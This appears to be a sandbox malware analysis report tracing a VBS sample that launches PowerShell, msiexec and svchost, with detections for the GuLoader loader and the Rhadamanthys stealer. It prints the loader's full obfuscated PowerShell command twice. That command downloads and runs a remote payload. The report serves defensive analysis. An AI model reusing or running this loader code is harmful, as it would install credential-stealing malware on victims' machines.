                                                                                                                  Data Ascii: M&/\7mO0m!o%5H>$C,K\zT><]O)T(J^B7EHS$CR$,_2Ngr5"C2IHq@Gwb5|y`TX~MxiF&$pz#;jr,S,7]j|}4mao\_%vJeGdo8bTx,qR


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:04:45:54
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs"
                                                                                                                  Imagebase:0x7ff6820a0000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:04:45:54
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:wmic diskdrive get caption,serialnumber
                                                                                                                  Imagebase:0x7ff7492c0000
                                                                                                                  File size:576'000 bytes
                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:04:45:54
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:04:45:55
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Mareschal 'C sE.TSoaBarBotD.-OiS SL SeRre,rp S L4');Dilemmatically (Mareschal 'Bu$ GM.L.oO VBCoADil k:OfvB,iH R ouDeSW SUdEReNR s B=Aa(R th e iShat.n- P.oaFlT H S Ha$B fSao srSan EjToEN dS eopS )') ;Dilemmatically (Mareschal 'L.$BrGunlKjOudBMea BlH.:Vag COBllModPaBCiEPrRBuR YCa=.e$ougImlTaOV bP,A kLNi: OgMilTyaAbmDeOInrSvIMoz aASlt.fi UOP.NMeSUn+He+ a%,k$ Sc .HM aUdpCalSeeH,SSwsD..CocBaoOluPrNsst') ;$Partisk=$Chapless[$Goldberry]}$Overmaling=304709;$Brudfladerne=28809;Dilemmatically (Mareschal ' P$ aG L,toAbBS AVaL V:SyUSmNWoBs A r BE aStR oo CU SsDd .e=st Apg FESktTy- oc oOIfn ITDee N utIs $Atfnoo.tRSpn rj aEDaDA E Ns');Dilemmatically (Mareschal ' L$Tog.elsmo eb taVilAf:C.UocnsuiI vO,eWhr sSoaTelWhs t or om,kfrooLyr PsskyKonPoiD nC gTye r Tr=Ma Al[RaS Ry,uscyt tePemPs.FoCO o nWovOdeMorPltSt]Ut:Bo:FlF erGroN mPrB Aa MsC.e v6Bi4OvS,otflrPei PnbigO,( G$PaU TnI b Ba urKnbC aInr .o uSisPr)');Dilemmatically (Mareschal ' $HeG.tLKaoU,BBiAMoLA.:n bT,RamIZyG i .tJ Tst an=En .a[SesNoYDdS rTIneSoMAa.EltFieecXAuTHu. aeEnnP C Ao edhyiBenPigKl]Ks:Bi:OuA rSprc ,i iBi.D,GEnE .Tc SMbTexrSoIKlnKugMe( O$PruS N ,iDov teMurS SSvaShL.rSHatA RrimK FDeOKrrOvs PY n SI.oNt G,ueStr T)');Dilemmatically (Mareschal ' A$ ,g,il OOSeBStAAnlhu:Sts UtSkiTokLanG.a.uREaKB,OT M maEnn fe SRL,N,rEStsSo= m$ oB Ar I CG CIGaTT TBr.ArSAnUPrbTysTrtunRReiB nExg P(Sp$NaOOrV eeTirH,M ACoL,eispnM Gco,.r$ TBKrR puJuDL FcrlAgABaDM eK,R tNNeeB,)');Dilemmatically $Stiknarkomanernes;"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1820309274.000002241006F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:04:45:55
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:04:46:06
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Mareschal 'C sE.TSoaBarBotD.-OiS SL SeRre,rp S L4');Dilemmatically (Mareschal 'Bu$ GM.L.oO VBCoADil k:OfvB,iH R ouDeSW SUdEReNR s B=Aa(R th e iShat.n- P.oaFlT H S Ha$B fSao srSan EjToEN dS eopS )') ;Dilemmatically (Mareschal 'L.$BrGunlKjOudBMea BlH.:Vag COBllModPaBCiEPrRBuR YCa=.e$ougImlTaOV bP,A kLNi: OgMilTyaAbmDeOInrSvIMoz aASlt.fi UOP.NMeSUn+He+ a%,k$ Sc .HM aUdpCalSeeH,SSwsD..CocBaoOluPrNsst') ;$Partisk=$Chapless[$Goldberry]}$Overmaling=304709;$Brudfladerne=28809;Dilemmatically (Mareschal ' P$ aG L,toAbBS AVaL V:SyUSmNWoBs A r BE aStR oo CU SsDd .e=st Apg FESktTy- oc oOIfn ITDee N utIs $Atfnoo.tRSpn rj aEDaDA E Ns');Dilemmatically (Mareschal ' L$Tog.elsmo eb taVilAf:C.UocnsuiI vO,eWhr sSoaTelWhs t or om,kfrooLyr PsskyKonPoiD nC gTye r Tr=Ma Al[RaS Ry,uscyt tePemPs.FoCO o nWovOdeMorPltSt]Ut:Bo:FlF erGroN mPrB Aa MsC.e v6Bi4OvS,otflrPei PnbigO,( G$PaU TnI b Ba urKnbC aInr .o uSisPr)');Dilemmatically (Mareschal ' $HeG.tLKaoU,BBiAMoLA.:n bT,RamIZyG i .tJ Tst an=En .a[SesNoYDdS rTIneSoMAa.EltFieecXAuTHu. aeEnnP C Ao edhyiBenPigKl]Ks:Bi:OuA rSprc ,i iBi.D,GEnE .Tc SMbTexrSoIKlnKugMe( O$PruS N ,iDov teMurS SSvaShL.rSHatA RrimK FDeOKrrOvs PY n SI.oNt G,ueStr T)');Dilemmatically (Mareschal ' A$ ,g,il OOSeBStAAnlhu:Sts UtSkiTokLanG.a.uREaKB,OT M maEnn fe SRL,N,rEStsSo= m$ oB Ar I CG CIGaTT TBr.ArSAnUPrbTysTrtunRReiB nExg P(Sp$NaOOrV eeTirH,M ACoL,eispnM Gco,.r$ TBKrR puJuDL FcrlAgABaDM eK,R tNNeeB,)');Dilemmatically $Stiknarkomanernes;"
                                                                                                                  Imagebase:0xf40000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1960598330.0000000008EF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1936823765.000000000628B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1961051493.000000000ABA5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:04:46:06
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:04:46:20
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                  Imagebase:0x1c0000
                                                                                                                  File size:59'904 bytes
                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.2008744102.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000003.2013688263.00000000056E5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.2020607933.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:04:46:29
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                  Imagebase:0x930000
                                                                                                                  File size:46'504 bytes
                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.2013624031.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.2016070238.0000000004D00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.2015900847.0000000004AE0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000002.2104903369.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:04:46:38
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:04:46:50
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrBC15.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1aeadd7b/4a1b3c1a"
                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:04:46:50
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:04:46:51
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2488,i,17319326758939712999,7125565057770333449,262144 /prefetch:8
                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:04:47:09
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Program Files\Windows Media Player\wmpnscfg.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Windows Media Player\wmpnscfg.exe"
                                                                                                                  Imagebase:0x7ff6f3970000
                                                                                                                  File size:71'168 bytes
                                                                                                                  MD5 hash:F912FF78DE347834EA56CEB0E12F80EC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:04:47:14
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\dllhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                                  Imagebase:0x7ff70f330000
                                                                                                                  File size:21'312 bytes
                                                                                                                  MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BAAAB4A Relevance: .5, Instructions: 467COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841064102.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b5b6788a25c45711aec84d15fb934d5d294bcefe529e20b0b02f5591fbf781bc
                                                                                                                    • Instruction ID: 6f5482d45c4ba3ead619c279073921a4070e44de780cdab0543d1b1698e5cf2b
                                                                                                                    • Opcode Fuzzy Hash: b5b6788a25c45711aec84d15fb934d5d294bcefe529e20b0b02f5591fbf781bc
                                                                                                                    • Instruction Fuzzy Hash: 6EE1A231A09A4D8FEBB8DF68C8557E977E2FF54310F04426EE84DC32A5DB74A9418B81
                                                                                                                    Function 00007FFD9BAAB8D2 Relevance: .5, Instructions: 463COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841064102.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f2433652b4ae17693fed6da2f47aa78015a61214a72b8467842e4bcb1193a73
                                                                                                                    • Instruction ID: 6abc29adc5cafa2b9cbd0212f675aa11a750241337f217dfc3f669532ab713e5
                                                                                                                    • Opcode Fuzzy Hash: 6f2433652b4ae17693fed6da2f47aa78015a61214a72b8467842e4bcb1193a73
                                                                                                                    • Instruction Fuzzy Hash: 7DE1B530A09A4E8FEBA8DF28C8657E977D2FF54310F44426AD84DC72A5DF7899418B81
                                                                                                                    Function 00007FFD9BAA3E54 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841064102.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: _
                                                                                                                    • API String ID: 0-701932520
                                                                                                                    • Opcode ID: 9c4554df76dd9cf33539f71ee0c08d80fd148544c154fc90982d7bc5ed8c0f5d
                                                                                                                    • Instruction ID: f3104b1b7ee4625dbe3c3c7c2a3d82be587a01a2190e382cd5b4c2421ab8dd50
                                                                                                                    • Opcode Fuzzy Hash: 9c4554df76dd9cf33539f71ee0c08d80fd148544c154fc90982d7bc5ed8c0f5d
                                                                                                                    • Instruction Fuzzy Hash: 68C17F31B18A4D8FDF94DF5CC495AAD77E2FF68304F11416AE409D72A6CA74E882CB90
                                                                                                                    Function 00007FFD9BAACFCF Relevance: .7, Instructions: 665COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841064102.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
